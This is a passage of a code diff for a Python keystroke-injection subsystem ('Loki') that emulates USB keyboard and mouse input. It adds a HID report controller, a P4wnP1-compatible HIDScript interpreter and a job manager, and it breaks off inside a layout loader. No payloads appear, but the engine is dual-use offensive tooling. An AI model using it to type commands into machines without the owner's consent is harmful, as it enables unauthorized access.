                pass
        if self._mouse_fd is not None:
            try:
                # Report ID 1, all buttons up, no movement.
                os.write(self._mouse_fd, bytes([0x01, 0, 0, 0, 0, 0]))
            except OSError:
                pass

    def press_combo(self, combo_str: str):
        """Press a key combination like 'GUI r', 'CTRL ALT DELETE'.

        Keys are separated by spaces. All are pressed simultaneously,
        then released. Single characters not in the combo map are
        resolved through the current layout (so 'CTRL ALT t' works).
        """
        parts = combo_str.strip().split()
        mod_mask = 0
        keycodes = []
        for part in parts:
            upper = part.upper()
            if upper in _COMBO_MAP:
                m, k = _COMBO_MAP[upper]
                mod_mask |= m
                if k != KEY_NONE:
                    keycodes.append(k)
            else:
                # Try single char via layout
                if len(part) == 1 and part in self._layout:
                    char_mod, char_key = self._layout[part]
                    mod_mask |= char_mod
                    keycodes.append(char_key)
                else:
                    logger.warning("Unknown combo key: '%s'", part)
        if keycodes or mod_mask:
            self.send_key_report(mod_mask, keycodes)
            # Brief hold so the host registers the chord before release.
            time.sleep(0.02)
            self.send_key_report(0, [])  # release

    def type_string(self, text: str, stop_event: Event = None):
        """Type a string character by character using the current layout.

        Unmapped characters are logged and skipped. An optional
        stop_event aborts typing between keystrokes.
        """
        for ch in text:
            if stop_event and stop_event.is_set():
                return
            if ch in self._layout:
                mod, key = self._layout[ch]
                self.send_key_report(mod, [key])
                time.sleep(0.01)
                self.send_key_report(0, [])  # release
            else:
                logger.warning("Unmapped char: %r", ch)
                continue
            # Inter-keystroke delay
            if self._speed_max > 0:
                delay = random.randint(self._speed_min, self._speed_max) / 1000.0
                if stop_event:
                    # wait() instead of sleep() so a stop interrupts the delay.
                    stop_event.wait(delay)
                else:
                    time.sleep(delay)
            else:
                time.sleep(0.005)  # tiny default gap for reliability

    # ── LED State ──────────────────────────────────────────────
    def read_led_state(self) -> int:
        """Read current LED state from host (non-blocking). Returns bitmask."""
        if self._kbd_fd is None:
            return 0
        try:
            # Zero timeout: poll only, never block the caller.
            r, _, _ = select.select([self._kbd_fd], [], [], 0)
            if r:
                data = os.read(self._kbd_fd, 1)
                if data:
                    return data[0]
        except OSError:
            pass
        return 0

    def wait_led(self, mask: int, stop_event: Event = None, timeout: float = 0):
        """Block until host LED state matches mask.

        mask=LED_ANY matches any LED change (relative to the state when
        the wait started). timeout=0 means wait forever.
        Returns True if matched, False if stopped/timed out.
        """
        start = time.monotonic()
        initial = self.read_led_state()
        while True:
            if stop_event and stop_event.is_set():
                return False
            if timeout > 0 and (time.monotonic() - start) > timeout:
                return False
            current = self.read_led_state()
            if mask == LED_ANY:
                if current != initial:
                    return True
            else:
                if current & mask:
                    return True
            time.sleep(0.05)

    def wait_led_repeat(self, mask: int, count: int, stop_event: Event = None):
        """Wait for LED to toggle count times. Returns False if any wait fails."""
        for _ in range(count):
            if not self.wait_led(mask, stop_event):
                return False
        return True

    # ── Mouse Reports ──────────────────────────────────────────
    # P4wnP1 mouse descriptor uses Report ID 1 for relative mode.
    # Report format: [0x01, buttons, X, Y, 0x00, 0x00] = 6 bytes
    def send_mouse_report(self, buttons: int, x: int, y: int, wheel: int = 0):
        """Send a 6-byte relative mouse report with Report ID 1.

        Format: [report_id=1, buttons, X, Y, pad, pad]
        X/Y are clamped to the signed-byte range of the descriptor.
        NOTE(review): the `wheel` argument is currently ignored — confirm
        whether the descriptor supports a wheel axis.
        """
        if self._mouse_fd is None:
            return
        # Clamp to signed byte range
        x = max(-127, min(127, x))
        y = max(-127, min(127, y))
        report = struct.pack("BBbbBB", 0x01, buttons & 0xFF, x, y, 0, 0)
        os.write(self._mouse_fd, report)

    def mouse_move(self, x: int, y: int):
        """Move mouse by (x, y) relative pixels."""
        self.send_mouse_report(0, x, y)

    def mouse_move_stepped(self, x: int, y: int, step: int = 10):
        """Move mouse in small increments for better tracking."""
        while x != 0 or y != 0:
            dx = max(-step, min(step, x))
            dy = max(-step, min(step, y))
            self.send_mouse_report(0, dx, dy)
            x -= dx
            y -= dy
            time.sleep(0.005)

    def mouse_click(self, button: int = 1):
        """Click a mouse button (1=left, 2=right, 4=middle)."""
        self.send_mouse_report(button, 0, 0)
        time.sleep(0.05)
        self.send_mouse_report(0, 0, 0)

    def mouse_double_click(self, button: int = 1):
        """Double-click a mouse button."""
        self.mouse_click(button)
        time.sleep(0.05)
        self.mouse_click(button)

748
loki/hidscript.py Normal file
View File

@@ -0,0 +1,748 @@
"""
HIDScript parser and executor for Loki.
Supports P4wnP1-compatible HIDScript syntax:
- Function calls: type("hello"); press("GUI r"); delay(500);
- var declarations: var x = 1;
- for / while loops
- if / else conditionals
- // and /* */ comments
- String concatenation with +
- Basic arithmetic (+, -, *, /)
- console.log() for job output
Zero external dependencies — pure Python DSL parser.
"""
import re
import time
import logging
from threading import Event
from logger import Logger
logger = Logger(name="loki.hidscript", level=logging.DEBUG)
# ── LED constants (available in scripts) ──────────────────────
# Mirror the keyboard LED bitmasks so scripts can waitLED(CAPS) etc.
NUM = 0x01     # Num Lock
CAPS = 0x02    # Caps Lock
SCROLL = 0x04  # Scroll Lock
ANY = 0xFF     # any LED change
# ── Mouse button constants ────────────────────────────────────
BT1 = 1  # Left
BT2 = 2  # Right
BT3 = 4  # Middle
BTNONE = 0  # no button (release)
class HIDScriptError(Exception):
    """Raised when HIDScript parsing or execution fails."""

    def __init__(self, message, line=None):
        self.line = line
        # Prefix the offending line number when one is known.
        if line:
            message = f"Line {line}: {message}"
        super().__init__(message)
class HIDScriptParser:
    """Parse and execute P4wnP1-compatible HIDScript.

    Source is split into a small statement tree (assign / expr / for /
    while / if) which is interpreted directly; expressions are evaluated
    recursively, splitting on the lowest-precedence top-level operator
    first. Built-in functions dispatch to the HID controller.
    """

    def __init__(self, hid_controller, layout="us"):
        self.hid = hid_controller      # HIDController that emits key/mouse reports
        self._default_layout = layout  # used when layout() is called without args
        self._output = []              # console.log output

    def execute(self, source: str, stop_event: Event = None, job_id: str = ""):
        """Parse and execute a HIDScript source string.

        Returns list of console.log output lines. Execution stops at
        statement granularity when stop_event is set.
        """
        self._output = []
        self._stop = stop_event or Event()
        self._vars = {
            # Built-in constants
            "NUM": NUM, "CAPS": CAPS, "SCROLL": SCROLL, "ANY": ANY,
            "BT1": BT1, "BT2": BT2, "BT3": BT3, "BTNONE": BTNONE,
            "true": True, "false": False, "null": None,
        }
        # Strip comments
        source = self._strip_comments(source)
        # Tokenize into statements
        stmts = self._parse_block(source)
        # Execute
        self._exec_stmts(stmts)
        return self._output

    # ── Comment stripping ──────────────────────────────────────
    def _strip_comments(self, source: str) -> str:
        """Remove // and /* */ comments."""
        # Block comments first
        source = re.sub(r'/\*.*?\*/', '', source, flags=re.DOTALL)
        # Line comments
        source = re.sub(r'//[^\n]*', '', source)
        return source

    # ── Parser ─────────────────────────────────────────────────
    def _parse_block(self, source: str) -> list:
        """Parse source into a list of statement dicts."""
        stmts = []
        pos = 0
        source = source.strip()
        while pos < len(source):
            if self._stop.is_set():
                break
            pos = self._skip_ws(source, pos)
            if pos >= len(source):
                break
            # var declaration
            if source[pos:pos+4] == 'var ' or source[pos:pos+4] == 'let ':
                end = source.find(';', pos)
                if end == -1:
                    end = len(source)
                decl = source[pos+4:end].strip()
                eq = decl.find('=')
                if eq >= 0:
                    name = decl[:eq].strip()
                    value_expr = decl[eq+1:].strip()
                    stmts.append({"type": "assign", "name": name, "expr": value_expr})
                else:
                    # Declaration without initializer defaults to null.
                    stmts.append({"type": "assign", "name": decl.strip(), "expr": "null"})
                pos = end + 1
            # for loop
            elif source[pos:pos+4] == 'for ' or source[pos:pos+4] == 'for(':
                stmt, pos = self._parse_for(source, pos)
                stmts.append(stmt)
            # while loop
            elif source[pos:pos+6] == 'while ' or source[pos:pos+6] == 'while(':
                stmt, pos = self._parse_while(source, pos)
                stmts.append(stmt)
            # if statement
            elif source[pos:pos+3] == 'if ' or source[pos:pos+3] == 'if(':
                stmt, pos = self._parse_if(source, pos)
                stmts.append(stmt)
            # Block: { ... }
            elif source[pos] == '{':
                end = self._find_matching_brace(source, pos)
                inner = source[pos+1:end]
                stmts.extend(self._parse_block(inner))
                pos = end + 1
            # Expression statement (function call or assignment)
            else:
                end = source.find(';', pos)
                if end == -1:
                    end = len(source)
                expr = source[pos:end].strip()
                if expr:
                    # Assignment: name = expr. The (?!=) lookahead keeps a
                    # comparison like `x == 1` from being misparsed as an
                    # assignment of "= 1" to x.
                    m = re.match(r'^([a-zA-Z_]\w*)\s*=(?!=)\s*(.+)$', expr)
                    if m:
                        stmts.append({"type": "assign", "name": m.group(1), "expr": m.group(2)})
                    else:
                        stmts.append({"type": "expr", "expr": expr})
                pos = end + 1
        return stmts

    def _parse_for(self, source, pos):
        """Parse: for (init; cond; incr) { body }"""
        # Find parenthesized header
        p_start = source.index('(', pos)
        p_end = self._find_matching_paren(source, p_start)
        header = source[p_start+1:p_end]
        parts = header.split(';')
        if len(parts) != 3:
            raise HIDScriptError("Invalid for loop header")
        init_expr = parts[0].strip()
        cond_expr = parts[1].strip()
        incr_expr = parts[2].strip()
        # Remove var/let prefix from init
        for prefix in ('var ', 'let '):
            if init_expr.startswith(prefix):
                init_expr = init_expr[len(prefix):]
        # Find body: either a braced block or a single statement up to ';'
        body_start = self._skip_ws(source, p_end + 1)
        if body_start < len(source) and source[body_start] == '{':
            body_end = self._find_matching_brace(source, body_start)
            body = source[body_start+1:body_end]
            next_pos = body_end + 1
        else:
            semi = source.find(';', body_start)
            if semi == -1:
                semi = len(source)
            body = source[body_start:semi]
            next_pos = semi + 1
        return {
            "type": "for",
            "init": init_expr,
            "cond": cond_expr,
            "incr": incr_expr,
            "body": body,
        }, next_pos

    def _parse_while(self, source, pos):
        """Parse: while (cond) { body }"""
        p_start = source.index('(', pos)
        p_end = self._find_matching_paren(source, p_start)
        cond = source[p_start+1:p_end].strip()
        body_start = self._skip_ws(source, p_end + 1)
        if body_start < len(source) and source[body_start] == '{':
            body_end = self._find_matching_brace(source, body_start)
            body = source[body_start+1:body_end]
            next_pos = body_end + 1
        else:
            semi = source.find(';', body_start)
            if semi == -1:
                semi = len(source)
            body = source[body_start:semi]
            next_pos = semi + 1
        return {"type": "while", "cond": cond, "body": body}, next_pos

    def _parse_if(self, source, pos):
        """Parse: if (cond) { body } [else { body }]"""
        p_start = source.index('(', pos)
        p_end = self._find_matching_paren(source, p_start)
        cond = source[p_start+1:p_end].strip()
        body_start = self._skip_ws(source, p_end + 1)
        if body_start < len(source) and source[body_start] == '{':
            body_end = self._find_matching_brace(source, body_start)
            body = source[body_start+1:body_end]
            next_pos = body_end + 1
        else:
            semi = source.find(';', body_start)
            if semi == -1:
                semi = len(source)
            body = source[body_start:semi]
            next_pos = semi + 1
        # Check for else
        else_body = None
        check = self._skip_ws(source, next_pos)
        if source[check:check+4] == 'else':
            after_else = self._skip_ws(source, check + 4)
            if after_else < len(source) and source[after_else] == '{':
                eb_end = self._find_matching_brace(source, after_else)
                else_body = source[after_else+1:eb_end]
                next_pos = eb_end + 1
            elif source[after_else:after_else+2] == 'if':
                # else if — parse recursively
                inner_if, next_pos = self._parse_if(source, after_else)
                else_body = inner_if  # will be a dict, handle in exec
            else:
                semi = source.find(';', after_else)
                if semi == -1:
                    semi = len(source)
                else_body = source[after_else:semi]
                next_pos = semi + 1
        return {"type": "if", "cond": cond, "body": body, "else": else_body}, next_pos

    # ── Executor ───────────────────────────────────────────────
    def _exec_stmts(self, stmts: list):
        """Execute a list of parsed statements."""
        for stmt in stmts:
            if self._stop.is_set():
                return
            stype = stmt["type"]
            if stype == "assign":
                self._vars[stmt["name"]] = self._eval_expr(stmt["expr"])
            elif stype == "expr":
                self._eval_expr(stmt["expr"])
            elif stype == "for":
                self._exec_for(stmt)
            elif stype == "while":
                self._exec_while(stmt)
            elif stype == "if":
                self._exec_if(stmt)

    def _exec_for(self, stmt):
        """Execute a for loop (iteration-capped to avoid runaway scripts)."""
        # Parse init as assignment
        init = stmt["init"]
        eq = init.find('=')
        if eq >= 0:
            name = init[:eq].strip()
            self._vars[name] = self._eval_expr(init[eq+1:].strip())
        max_iterations = 100000
        i = 0
        while i < max_iterations:
            if self._stop.is_set():
                return
            if not self._eval_expr(stmt["cond"]):
                break
            self._exec_stmts(self._parse_block(stmt["body"]))
            # Execute increment
            incr = stmt["incr"]
            if "++" in incr:
                var_name = incr.replace("++", "").strip()
                self._vars[var_name] = self._vars.get(var_name, 0) + 1
            elif "--" in incr:
                var_name = incr.replace("--", "").strip()
                self._vars[var_name] = self._vars.get(var_name, 0) - 1
            else:
                eq = incr.find('=')
                if eq >= 0:
                    name = incr[:eq].strip()
                    self._vars[name] = self._eval_expr(incr[eq+1:].strip())
            i += 1

    def _exec_while(self, stmt):
        """Execute a while loop (iteration-capped to avoid runaway scripts)."""
        max_iterations = 1000000
        i = 0
        while i < max_iterations:
            if self._stop.is_set():
                return
            if not self._eval_expr(stmt["cond"]):
                break
            self._exec_stmts(self._parse_block(stmt["body"]))
            i += 1

    def _exec_if(self, stmt):
        """Execute an if/else statement."""
        if self._eval_expr(stmt["cond"]):
            self._exec_stmts(self._parse_block(stmt["body"]))
        elif stmt.get("else"):
            else_part = stmt["else"]
            if isinstance(else_part, dict):
                # else if
                self._exec_if(else_part)
            else:
                self._exec_stmts(self._parse_block(else_part))

    # ── Expression Evaluator ───────────────────────────────────
    def _is_string_literal(self, expr: str) -> bool:
        """True if expr is exactly ONE quoted string literal.

        Checking only the first/last characters is not enough:
        '"a" + "b"' starts and ends with quotes but is a concatenation,
        not a literal. The opening quote must close at the final char.
        """
        if len(expr) < 2:
            return False
        quote = expr[0]
        if quote not in ('"', "'") or expr[-1] != quote:
            return False
        i = 1
        while i < len(expr) - 1:
            if expr[i] == '\\':
                i += 2  # skip escaped char
                continue
            if expr[i] == quote:
                return False  # quote closes before the end
            i += 1
        return True

    def _eval_expr(self, expr):
        """Evaluate an expression string and return its value."""
        if isinstance(expr, (int, float, bool)):
            return expr
        if not isinstance(expr, str):
            return expr
        expr = expr.strip()
        if not expr:
            return None
        # String literal (must be a single complete literal — see helper)
        if self._is_string_literal(expr):
            return self._unescape(expr[1:-1])
        # Numeric literal
        try:
            if '.' in expr:
                return float(expr)
            return int(expr)
        except ValueError:
            pass
        # Boolean / null
        if expr == 'true':
            return True
        if expr == 'false':
            return False
        if expr == 'null':
            return None
        # String concatenation with +
        if self._has_top_level_op(expr, '+') and self._contains_string(expr):
            parts = self._split_top_level(expr, '+')
            result = ""
            for p in parts:
                val = self._eval_expr(p.strip())
                result += str(val) if val is not None else ""
            return result
        # Comparison operators
        for op in ['===', '!==', '==', '!=', '>=', '<=', '>', '<']:
            if self._has_top_level_op(expr, op):
                parts = self._split_top_level(expr, op, max_splits=1)
                if len(parts) == 2:
                    left = self._eval_expr(parts[0].strip())
                    right = self._eval_expr(parts[1].strip())
                    if op in ('==', '==='):
                        return left == right
                    elif op in ('!=', '!=='):
                        return left != right
                    elif op == '>':
                        return left > right
                    elif op == '<':
                        return left < right
                    elif op == '>=':
                        return left >= right
                    elif op == '<=':
                        return left <= right
        # Logical operators
        if self._has_top_level_op(expr, '&&'):
            parts = self._split_top_level(expr, '&&', max_splits=1)
            return self._eval_expr(parts[0]) and self._eval_expr(parts[1])
        if self._has_top_level_op(expr, '||'):
            parts = self._split_top_level(expr, '||', max_splits=1)
            return self._eval_expr(parts[0]) or self._eval_expr(parts[1])
        # Arithmetic — split on lowest-precedence operators first
        for op in ['+', '-']:
            if self._has_top_level_op(expr, op) and not self._contains_string(expr):
                parts = self._split_top_level(expr, op)
                result = self._eval_expr(parts[0].strip())
                for p in parts[1:]:
                    val = self._eval_expr(p.strip())
                    if op == '+':
                        result = (result or 0) + (val or 0)
                    else:
                        result = (result or 0) - (val or 0)
                return result
        for op in ['*', '/']:
            if self._has_top_level_op(expr, op):
                parts = self._split_top_level(expr, op)
                result = self._eval_expr(parts[0].strip())
                for p in parts[1:]:
                    val = self._eval_expr(p.strip())
                    if op == '*':
                        result = (result or 0) * (val or 0)
                    else:
                        result = (result or 0) / (val or 1)
                return result
        # Modulo
        if self._has_top_level_op(expr, '%'):
            parts = self._split_top_level(expr, '%')
            result = self._eval_expr(parts[0].strip())
            for p in parts[1:]:
                val = self._eval_expr(p.strip())
                result = (result or 0) % (val or 1)
            return result
        # Negation
        if expr.startswith('!'):
            return not self._eval_expr(expr[1:])
        # Parenthesized expression
        if expr.startswith('(') and self._find_matching_paren(expr, 0) == len(expr) - 1:
            return self._eval_expr(expr[1:-1])
        # Function call
        m = re.match(r'^([a-zA-Z_][\w.]*)\s*\(', expr)
        if m:
            func_name = m.group(1)
            p_start = expr.index('(')
            p_end = self._find_matching_paren(expr, p_start)
            args_str = expr[p_start+1:p_end]
            args = self._parse_args(args_str)
            return self._call_func(func_name, args)
        # Variable reference
        if re.match(r'^[a-zA-Z_]\w*$', expr):
            return self._vars.get(expr, 0)
        # Increment/decrement as expression (post-increment semantics)
        if expr.endswith('++'):
            name = expr[:-2].strip()
            val = self._vars.get(name, 0)
            self._vars[name] = val + 1
            return val
        if expr.endswith('--'):
            name = expr[:-2].strip()
            val = self._vars.get(name, 0)
            self._vars[name] = val - 1
            return val
        logger.warning("Cannot evaluate expression: %r", expr)
        return 0

    # ── Built-in Functions ─────────────────────────────────────
    def _call_func(self, name: str, args: list):
        """Dispatch a built-in function call."""
        # Evaluate all arguments
        evaled = [self._eval_expr(a) for a in args]
        if name == "type":
            text = str(evaled[0]) if evaled else ""
            self.hid.type_string(text, stop_event=self._stop)
        elif name == "press":
            combo = str(evaled[0]) if evaled else ""
            self.hid.press_combo(combo)
        elif name == "delay":
            ms = int(evaled[0]) if evaled else 0
            if ms > 0:
                # wait() so a stop request interrupts the delay.
                self._stop.wait(ms / 1000.0)
        elif name == "layout":
            name_val = str(evaled[0]) if evaled else self._default_layout
            self.hid.set_layout(name_val)
        elif name == "typingSpeed":
            min_ms = int(evaled[0]) if len(evaled) > 0 else 0
            max_ms = int(evaled[1]) if len(evaled) > 1 else min_ms
            self.hid.set_typing_speed(min_ms, max_ms)
        elif name == "move":
            x = int(evaled[0]) if len(evaled) > 0 else 0
            y = int(evaled[1]) if len(evaled) > 1 else 0
            self.hid.mouse_move(x, y)
        elif name == "moveTo":
            x = int(evaled[0]) if len(evaled) > 0 else 0
            y = int(evaled[1]) if len(evaled) > 1 else 0
            self.hid.mouse_move_stepped(x, y, step=5)
        elif name == "moveStepped":
            x = int(evaled[0]) if len(evaled) > 0 else 0
            y = int(evaled[1]) if len(evaled) > 1 else 0
            step = int(evaled[2]) if len(evaled) > 2 else 10
            self.hid.mouse_move_stepped(x, y, step=step)
        elif name == "click":
            btn = int(evaled[0]) if evaled else BT1
            self.hid.mouse_click(btn)
        elif name == "doubleClick":
            btn = int(evaled[0]) if evaled else BT1
            self.hid.mouse_double_click(btn)
        elif name == "button":
            mask = int(evaled[0]) if evaled else 0
            self.hid.send_mouse_report(mask, 0, 0)
        elif name == "waitLED":
            mask = int(evaled[0]) if evaled else ANY
            timeout = float(evaled[1]) / 1000 if len(evaled) > 1 else 0
            return self.hid.wait_led(mask, self._stop, timeout)
        elif name == "waitLEDRepeat":
            mask = int(evaled[0]) if evaled else ANY
            count = int(evaled[1]) if len(evaled) > 1 else 1
            return self.hid.wait_led_repeat(mask, count, self._stop)
        elif name == "console.log" or name == "log":
            msg = " ".join(str(a) for a in evaled)
            self._output.append(msg)
            logger.debug("[HIDScript] %s", msg)
        elif name in ("parseInt", "Number"):
            try:
                return int(float(evaled[0])) if evaled else 0
            except (ValueError, TypeError):
                return 0
        elif name == "String":
            return str(evaled[0]) if evaled else ""
        elif name == "Math.random":
            import random
            return random.random()
        elif name == "Math.floor":
            import math
            return math.floor(evaled[0]) if evaled else 0
        else:
            logger.warning("Unknown function: %s", name)
            return None
        return None

    # ── Helpers ────────────────────────────────────────────────
    def _parse_args(self, args_str: str) -> list:
        """Split function arguments respecting string literals and parens."""
        args = []
        depth = 0
        current = ""
        in_str = None
        for ch in args_str:
            if in_str:
                current += ch
                if ch == in_str and (len(current) < 2 or current[-2] != '\\'):
                    in_str = None
            elif ch in ('"', "'"):
                in_str = ch
                current += ch
            elif ch == '(':
                depth += 1
                current += ch
            elif ch == ')':
                depth -= 1
                current += ch
            elif ch == ',' and depth == 0:
                if current.strip():
                    args.append(current.strip())
                current = ""
            else:
                current += ch
        if current.strip():
            args.append(current.strip())
        return args

    def _unescape(self, s: str) -> str:
        """Process escape sequences in a string (single pass).

        A single left-to-right pass avoids the chained-replace bug where
        the output of one replacement is re-interpreted by the next
        (e.g. 'a\\\\nb' must become backslash + literal 'n', not a
        newline). Unknown escapes are kept verbatim.
        """
        escapes = {'n': '\n', 't': '\t', 'r': '\r', '"': '"', "'": "'", '\\': '\\'}
        out = []
        i = 0
        while i < len(s):
            ch = s[i]
            if ch == '\\' and i + 1 < len(s) and s[i + 1] in escapes:
                out.append(escapes[s[i + 1]])
                i += 2
            else:
                out.append(ch)
                i += 1
        return ''.join(out)

    def _skip_ws(self, source: str, pos: int) -> int:
        """Skip whitespace."""
        while pos < len(source) and source[pos] in ' \t\n\r':
            pos += 1
        return pos

    def _find_matching_brace(self, source: str, pos: int) -> int:
        """Find matching } for { at pos (string-aware)."""
        depth = 1
        i = pos + 1
        in_str = None
        while i < len(source):
            ch = source[i]
            if in_str:
                if ch == in_str and source[i-1] != '\\':
                    in_str = None
            elif ch in ('"', "'"):
                in_str = ch
            elif ch == '{':
                depth += 1
            elif ch == '}':
                depth -= 1
                if depth == 0:
                    return i
            i += 1
        # Unbalanced input: fall back to end of source.
        return len(source) - 1

    def _find_matching_paren(self, source: str, pos: int) -> int:
        """Find matching ) for ( at pos (string-aware)."""
        depth = 1
        i = pos + 1
        in_str = None
        while i < len(source):
            ch = source[i]
            if in_str:
                if ch == in_str and source[i-1] != '\\':
                    in_str = None
            elif ch in ('"', "'"):
                in_str = ch
            elif ch == '(':
                depth += 1
            elif ch == ')':
                depth -= 1
                if depth == 0:
                    return i
            i += 1
        # Unbalanced input: fall back to end of source.
        return len(source) - 1

    def _has_top_level_op(self, expr: str, op: str) -> bool:
        """Check if operator exists at top level (not inside parens/strings)."""
        depth = 0
        in_str = None
        i = 0
        while i < len(expr):
            ch = expr[i]
            if in_str:
                if ch == in_str and (i == 0 or expr[i-1] != '\\'):
                    in_str = None
            elif ch in ('"', "'"):
                in_str = ch
            elif ch == '(':
                depth += 1
            elif ch == ')':
                depth -= 1
            elif depth == 0 and expr[i:i+len(op)] == op:
                # Don't match multi-char ops that are substrings of longer ones
                if len(op) == 1 and op in '+-':
                    # Skip if part of ++ or --
                    if i + 1 < len(expr) and expr[i+1] == op:
                        i += 2
                        continue
                    if i > 0 and expr[i-1] == op:
                        i += 1
                        continue
                return True
            i += 1
        return False

    def _split_top_level(self, expr: str, op: str, max_splits: int = -1) -> list:
        """Split expression by operator at top level only."""
        parts = []
        depth = 0
        in_str = None
        current = ""
        i = 0
        splits = 0
        while i < len(expr):
            ch = expr[i]
            if in_str:
                current += ch
                if ch == in_str and (i == 0 or expr[i-1] != '\\'):
                    in_str = None
            elif ch in ('"', "'"):
                in_str = ch
                current += ch
            elif ch == '(':
                depth += 1
                current += ch
            elif ch == ')':
                depth -= 1
                current += ch
            elif depth == 0 and expr[i:i+len(op)] == op and (max_splits < 0 or splits < max_splits):
                # Don't split on ++ or -- when looking for + or -
                if len(op) == 1 and op in '+-':
                    if i + 1 < len(expr) and expr[i+1] == op:
                        current += ch
                        i += 1
                        current += expr[i]
                        i += 1
                        continue
                parts.append(current)
                current = ""
                i += len(op)
                splits += 1
                continue
            else:
                current += ch
            i += 1
        parts.append(current)
        return parts

    def _contains_string(self, expr: str) -> bool:
        """Check if expression contains a string literal at top level.

        Literals nested inside parentheses (e.g. function arguments) do
        NOT count: `f("a") + 1` is arithmetic, not string concatenation.
        """
        depth = 0
        in_str = None
        str_depth = 0
        for ch in expr:
            if in_str:
                if ch == in_str:
                    in_str = None
                    if str_depth == 0:
                        return True  # complete string literal at top level
            elif ch in ('"', "'"):
                in_str = ch
                str_depth = depth  # remember nesting depth where string opened
            elif ch == '(':
                depth += 1
            elif ch == ')':
                depth -= 1
        return False

162
loki/jobs.py Normal file
View File

@@ -0,0 +1,162 @@
"""
Loki job manager — tracks HIDScript execution jobs.
Each job runs in its own daemon thread.
"""
import uuid
import time
import logging
import traceback
from datetime import datetime
from threading import Thread, Event
from logger import Logger
logger = Logger(name="loki.jobs", level=logging.DEBUG)
class LokiJobManager:
    """Manages HIDScript job lifecycle.

    Each job runs in its own daemon thread. Job state is kept in memory
    (self._jobs) and mirrored best-effort to the `loki_jobs` DB table —
    DB failures are logged but never raised to callers.
    """

    def __init__(self, engine):
        self.engine = engine    # owning engine: provides shared_data.db and hid_controller
        self._jobs = {}         # job_id → job dict
        self._threads = {}      # job_id → Thread
        self._stops = {}        # job_id → Event

    def create_job(self, script_name: str, script_content: str) -> str:
        """Create and start a new job. Returns job_id (UUID).

        The returned id is the first 8 chars of a UUID4 — short enough
        for display, unique enough for the in-memory job table.
        """
        job_id = str(uuid.uuid4())[:8]
        now = datetime.now().isoformat()
        job = {
            "id": job_id,
            "script_name": script_name,
            "status": "pending",
            "output": "",
            "error": "",
            "started_at": None,
            "finished_at": None,
            "created_at": now,
        }
        self._jobs[job_id] = job
        stop = Event()
        self._stops[job_id] = stop
        # Persist to DB (best-effort; job still runs if this fails)
        try:
            db = self.engine.shared_data.db
            db.execute(
                "INSERT INTO loki_jobs (id, script_name, status, created_at) VALUES (?, ?, ?, ?)",
                (job_id, script_name, "pending", now)
            )
        except Exception as e:
            logger.error("DB insert job error: %s", e)
        # Start execution thread
        t = Thread(
            target=self._run_job,
            args=(job_id, script_content, stop),
            daemon=True,
            name=f"loki-job-{job_id}",
        )
        self._threads[job_id] = t
        t.start()
        logger.info("Job %s created: %s", job_id, script_name)
        return job_id

    def cancel_job(self, job_id: str) -> bool:
        """Cancel a running job. Returns True if a stop was signalled.

        NOTE(review): a job still in 'pending' state gets its stop event
        set but keeps its status until the worker observes it — confirm
        this is the intended behavior.
        """
        stop = self._stops.get(job_id)
        if stop:
            stop.set()
            job = self._jobs.get(job_id)
            if job and job["status"] == "running":
                job["status"] = "cancelled"
                job["finished_at"] = datetime.now().isoformat()
                self._update_db(job_id, "cancelled", job.get("output", ""), "Cancelled by user")
            logger.info("Job %s cancelled", job_id)
            return True
        return False

    def get_all_jobs(self) -> list:
        """Return list of all jobs (most recent first)."""
        jobs = list(self._jobs.values())
        jobs.sort(key=lambda j: j.get("created_at", ""), reverse=True)
        return jobs

    def get_job(self, job_id: str) -> dict:
        """Get a single job by ID (None if unknown)."""
        return self._jobs.get(job_id)

    def clear_completed(self):
        """Remove finished/failed/cancelled jobs from memory and DB."""
        to_remove = [
            jid for jid, j in self._jobs.items()
            if j["status"] in ("succeeded", "failed", "cancelled")
        ]
        for jid in to_remove:
            self._jobs.pop(jid, None)
            self._threads.pop(jid, None)
            self._stops.pop(jid, None)
        try:
            self.engine.shared_data.db.execute(
                "DELETE FROM loki_jobs WHERE status IN ('succeeded', 'failed', 'cancelled')"
            )
        except Exception as e:
            logger.error("DB clear jobs error: %s", e)

    @property
    def running_count(self) -> int:
        # Number of jobs whose worker thread is still executing a script.
        return sum(1 for j in self._jobs.values() if j["status"] == "running")

    # ── Internal ───────────────────────────────────────────────
    def _run_job(self, job_id: str, script_content: str, stop: Event):
        """Execute a HIDScript in this thread (worker entry point)."""
        job = self._jobs[job_id]
        job["status"] = "running"
        job["started_at"] = datetime.now().isoformat()
        self._update_db(job_id, "running")
        try:
            # Imported lazily to avoid a module-level import cycle.
            from loki.hidscript import HIDScriptParser
            parser = HIDScriptParser(self.engine.hid_controller)
            output_lines = parser.execute(script_content, stop_event=stop, job_id=job_id)
            if stop.is_set():
                job["status"] = "cancelled"
            else:
                job["status"] = "succeeded"
            job["output"] = "\n".join(output_lines)
        except Exception as e:
            job["status"] = "failed"
            job["error"] = str(e)
            job["output"] = traceback.format_exc()
            logger.error("Job %s failed: %s", job_id, e)
        finally:
            job["finished_at"] = datetime.now().isoformat()
            self._update_db(
                job_id, job["status"],
                job.get("output", ""),
                job.get("error", ""),
            )
            logger.info("Job %s finished: %s", job_id, job["status"])

    def _update_db(self, job_id: str, status: str, output: str = "", error: str = ""):
        """Persist job state to database (best-effort)."""
        try:
            db = self.engine.shared_data.db
            db.execute(
                "UPDATE loki_jobs SET status=?, output=?, error=?, "
                "started_at=?, finished_at=? WHERE id=?",
                (status, output, error,
                 self._jobs.get(job_id, {}).get("started_at"),
                 self._jobs.get(job_id, {}).get("finished_at"),
                 job_id)
            )
        except Exception as e:
            logger.error("DB update job error: %s", e)

45
loki/layouts/__init__.py Normal file
View File

@@ -0,0 +1,45 @@
"""
Keyboard layout loader for Loki HID subsystem.
Caches loaded layouts in memory.
"""
import json
import os
import logging
from logger import Logger
logger = Logger(name="loki.layouts", level=logging.DEBUG)
# Directory containing the bundled *.json layout files (this package dir).
_LAYOUT_DIR = os.path.dirname(os.path.abspath(__file__))
# name → layout dict; layouts are tiny, so an unbounded cache is fine.
_cache = {}
def load(name: str = "us") -> dict:
    """Load a keyboard layout by name.

    Returns the char → (modifier, keycode) map. Unknown layout names
    fall back to the bundled 'us' layout. Results are memoized in
    _cache, so each layout file is read at most once.
    """
    name = name.lower()
    if name in _cache:
        return _cache[name]
    path = os.path.join(_LAYOUT_DIR, f"{name}.json")
    if not os.path.isfile(path):
        logger.warning("Layout '%s' not found, falling back to 'us'", name)
        path = os.path.join(_LAYOUT_DIR, "us.json")
        name = "us"
        if name in _cache:
            return _cache[name]
    # Pin the encoding: layout files are UTF-8 JSON, and relying on the
    # system locale default can mis-decode non-ASCII layout entries.
